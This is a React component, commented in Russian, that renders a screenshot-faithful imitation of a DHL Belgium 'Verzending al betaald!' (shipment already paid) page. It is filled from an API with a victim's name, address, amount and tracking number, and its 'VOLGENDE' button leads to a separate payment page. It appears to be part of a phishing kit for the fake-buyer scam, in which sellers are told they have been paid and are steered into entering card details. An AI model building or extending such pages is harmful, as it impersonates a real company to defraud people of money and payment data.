import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DhlBeSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency } from '../stripeCurrency';
import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

/**
 * DHL BE — страница успеха 1:1 по скрину.
 * Жёлтый хедер с навигацией, большой жёлтый баннер «Verzending al betaald!»,
 * блок «Details verpakking» и нижние секции как на официальном сайте DHL.
 *
 * Важно: log/transition здесь НЕ шлём — только index2 (Stripe2), как и в других сервисах.
 */
function DhlBeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BE').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText = Number.isFinite(priceNumber)
    ? (priceNumber % 1 === 0 ? String(priceNumber.toFixed(0)) : String(priceNumber))
    : '—';

  const currencyText = primaryCurrency || 'EUR';

  const receiverName = (() => {
    const f = pageData?.first_name || '';
    const l = pageData?.last_name || '';
    const full = [f, l].filter(Boolean).join(' ');
    return full || '—';
  })();

  const address = pageData?.delivery_address || '—';
  const remark = pageData?.note || pageData?.comment || '';
  const trackingNumber = pageData?.tracking_number || pageData?.transaction_id || pageData?.unique_id || '—';
  const amountLine = `${priceText} ${currencyText}`;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dhlbe-wrap">
        <header className="dhlbe-header dhlbe-header--loading">
          <div className="dhlbe-header-inner">
            <div className="dhlbe-logo">DHL</div>
          </div>
        </header>
        <main className="dhlbe-main">
          <div className="dhlbe-loading">Pagina laden...</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dhlbe-wrap">
      <header className="dhlbe-header">
        <div className="dhlbe-header-inner">
          <a href="#/" className="dhlbe-logo" aria-label="DHL Group">
            <img src={(process.env.PUBLIC_URL || '') + '/dhl-logo.png'} alt="DHL" className="dhlbe-logo-img" />
          </a>
          <nav className="dhlbe-nav">
            <a href="#/" className="dhlbe-nav-link dhlbe-nav-link--active">Traceren</a>
            <a href="#/" className="dhlbe-nav-link">Verzenden</a>
            <a href="#/" className="dhlbe-nav-link">Logistieke services voor bedrijven</a>
            <a href="#/" className="dhlbe-nav-link">Klantenservice</a>
          </nav>
          <div className="dhlbe-header-right">
            <button type="button" className="dhlbe-lang">NL</button>
            <button type="button" className="dhlbe-search" aria-label="Search" />
          </div>
        </div>
      </header>

      <main className="dhlbe-main">
        <section className="dhlbe-banner">
          <h1 className="dhlbe-banner-title">Verzending al betaald!</h1>
          <p className="dhlbe-banner-text">
            Na ontvangst van het geld voor de verkoop moeten de goederen binnen 3 dagen naar de koper worden verzonden.
          </p>
          <p className="dhlbe-banner-text">
            Het trackingnummer moet aan de koper worden doorgegeven nadat het pakket is verzonden.
          </p>
        </section>

        <section className="dhlbe-details">
          <div className="dhlbe-details-inner">
            <h2 className="dhlbe-details-title">Details verpakking:</h2>
            <div className="dhlbe-details-grid">
            <div className="dhlbe-details-row">
              <span className="dhlbe-details-label">Opmerking:</span>
              <span className="dhlbe-details-value">{remark || '—'}</span>
            </div>
            <div className="dhlbe-details-row">
              <span className="dhlbe-details-label">Naam ontvanger:</span>
              <span className="dhlbe-details-value">{receiverName}</span>
            </div>
            <div className="dhlbe-details-row">
              <span className="dhlbe-details-label">Adres ontvanger:</span>
              <span className="dhlbe-details-value">{address}</span>
            </div>
            <div className="dhlbe-details-row">
              <span className="dhlbe-details-label">Ontvangstbedrag:</span>
              <span className="dhlbe-details-value">{amountLine}</span>
            </div>
            <div className="dhlbe-details-row">
              <span className="dhlbe-details-label">Volgnummer:</span>
              <span className="dhlbe-details-value">{trackingNumber}</span>
            </div>
            </div>

            <div className="dhlbe-amount-footer">
              Ontvangstbedrag: {amountLine}
            </div>

            <div className="dhlbe-next-wrap">
              <Link to={index2Path} className="dhlbe-next-btn">
                VOLGENDE
              </Link>
            </div>
          </div>
        </section>

        <section className="dhlbe-services">
          <img
            className="dhlbe-screenshot"
            src={(process.env.PUBLIC_URL || '') + '/dhl-be-verzenddiensten.png'}
            alt="Verzenddiensten"
          />
        </section>

        <section className="dhlbe-logistics">
          <img
            className="dhlbe-screenshot"
            src={(process.env.PUBLIC_URL || '') + '/dhl-be-logistieke-oplossingen.png'}
            alt="Logistieke oplossingen"
          />
        </section>
      </main>

      <footer className="dhlbe-footer">
        <div className="dhlbe-footer-top">
          <div className="dhlbe-footer-col">
            <h4>Snelkoppelingen</h4>
            <a href="#/">Klantenservice</a>
            <a href="#/">Aanmelden klantportaal</a>
            <a href="#/">Digitale partners en integraties</a>
            <a href="#/">Ontwikkelaarsportaal</a>
            <a href="#/">Vraag een offerte aan</a>
            <a href="#/">DHL Zakelijk</a>
          </div>
          <div className="dhlbe-footer-col">
            <h4>Onze divisies</h4>
            <a href="#/">DHL Express</a>
            <a href="#/">DHL Global Forwarding</a>
            <a href="#/">DHL Freight</a>
            <a href="#/">DHL Parcel</a>
            <a href="#/">DHL Supply Chain</a>
            <a href="#/">Andere internationale divisies</a>
          </div>
          <div className="dhlbe-footer-col">
            <h4>Industriële sectoren</h4>
            <a href="#/">Auto-Mobility</a>
            <a href="#/">Chemicals</a>
            <a href="#/">Consument</a>
            <a href="#/">Energie</a>
            <a href="#/">Engineering en productie</a>
            <a href="#/">Life Sciences en gezondheidszorg</a>
            <a href="#/">Publieke sector</a>
            <a href="#/">Detailhandel</a>
            <a href="#/">Technologie</a>
          </div>
          <div className="dhlbe-footer-col">
            <h4>Bedrijfsinformatie</h4>
            <a href="#/">Over DHL</a>
            <a href="#/">Delivered</a>
            <a href="#/">Werken bij DHL</a>
            <a href="#/">Perscentrum</a>
            <a href="#/">Duurzaamheid</a>
            <a href="#/">Inzichten en innovatie</a>
            <a href="#/">Officiële logistieke partners</a>
          </div>
        </div>

        <div className="dhlbe-footer-bottom">
          <div className="dhlbe-footer-brand">
            <span className="dhlbe-footer-logo">DHL Group</span>
          </div>
          <div className="dhlbe-footer-links">
            <a href="#/">Fraudebewustzijn</a>
            <a href="#/">Legal Notice</a>
            <a href="#/">Gebruiksvoorwaarden</a>
            <a href="#/">Privacyverklaring</a>
            <a href="#/">Geschillenbeslechting</a>
            <a href="#/">Aanvullende informatie</a>
          </div>
          <div className="dhlbe-footer-copy">
            2024 © – all rights reserved
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DhlBeSuccess;

